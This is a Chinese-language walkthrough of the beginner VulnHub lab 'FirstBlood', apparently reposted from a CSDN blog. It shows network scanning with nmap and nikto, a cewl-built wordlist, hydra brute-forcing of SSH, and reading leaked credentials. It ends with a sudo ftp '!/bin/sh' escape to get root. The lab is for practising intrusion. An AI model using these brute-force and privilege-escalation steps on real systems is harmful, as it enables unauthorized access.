ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

vulnhub-FirstBlood

2022-02-10 20:01:26  阅读:239  来源: 互联网

标签:bin sly sudo FirstBlood vulnhub README txt root


Description

A VERY beginner friendly box with a LOT of hand holding.

Once the system grabs an IP, head straight to the web port before scanning.

You will find your first set of instructions which starts the guided process.

Created in Virtualbox.

Goal: Get the root flag.

Your feedback is appreciated – Twitter: @iamv1nc3nt

这是一个新手向的靶机,教你如何渗透一台机器,每个步骤都有相应提示。

Walkthrough

获取靶机IP地址

sudo arp-scan -I eth0 -l 

在这里插入图片描述

获取到IP10.0.2.20

直接访问网页

在这里插入图片描述

查看网页源码

在这里插入图片描述

根据提示访问rambo.html

在这里插入图片描述

使用nmap进行端口扫描

nmap -p- 10.0.2.20 

在这里插入图片描述

发现开放60022端口

扫描web目录

nikto -h http://10.0.2.20/ 

在这里插入图片描述

发现另一个网站目录/johnnyrambo/,浏览器访问

在这里插入图片描述

接下来是ssh爆破,用cewl爬取网站生成一个wordlist

cewl -w words.txt -d 1 -m 5 http://10.0.2.20/johnnyrambo/ 

统计行数

wc -l words.txt                                                                     
137 words.txt

访问ssh.html

在这里插入图片描述

破解johnny的密码

hydra -l johnny -P words.txt -v 10.0.2.20 ssh -s 60022 -t 4 

在这里插入图片描述

破解成功,通过ssh登陆系统

ssh johnny@10.0.2.20 -p 60022  

登陆系统后,打开当前目录里的README.txt

在这里插入图片描述

由提示,可以用以下命令查看本地web目录

cat /etc/nginx/sites-enabled/default | grep -v "#"

在这里插入图片描述

进入/var/www/html/ ,发现另一个README.txt

在这里插入图片描述

查找README.txt文件

find / -type f -readable 2>/dev/null | grep README.txt

# 2>/dev/null  2为标准错误,将标准错误重定向到/dev/null

在这里插入图片描述

查看/opt/README.txt

在这里插入图片描述

得到一个账号密码

username:  blood
password:  HackThePlanet2020!!

切换用户

su - blood

在这里插入图片描述

登陆成功,发现blood用户目录下的README.txt,得知在/home目录下其他用户文件夹可能会有一些文件

在这里插入图片描述

进入sly用户文件夹发现两个文件,但仅有一个可读,权限不足。

通过sudo -l 查看当前用户权限

sudo -l

在这里插入图片描述

blood用户可以用sudo执行/bin/cat,查看/home/sly/README.txt

sudo -u sly /bin/cat /home/sly/README.txt

在这里插入图片描述

得到sly用户的密码:SylvesterStalone

切换用户sly

查看用户权限

sly@firstblood:~$ sudo -l
Matching Defaults entries for sly on firstblood:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sly may run the following commands on firstblood:
    (ALL) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/esudo-properties

利用sudo,可以root权限执行ftp。

在GTFOBins网站,可以找到获取root权限的方法

GTFOBins

在这里插入图片描述

sly@firstblood:~$ sudo ftp
[sudo] password for sly: 
ftp> !/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# 

ok。成功拿到root权限

在这里插入图片描述

标签:bin,sly,sudo,FirstBlood,vulnhub,README,txt,root
来源: https://blog.csdn.net/GALi_233/article/details/122867895

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有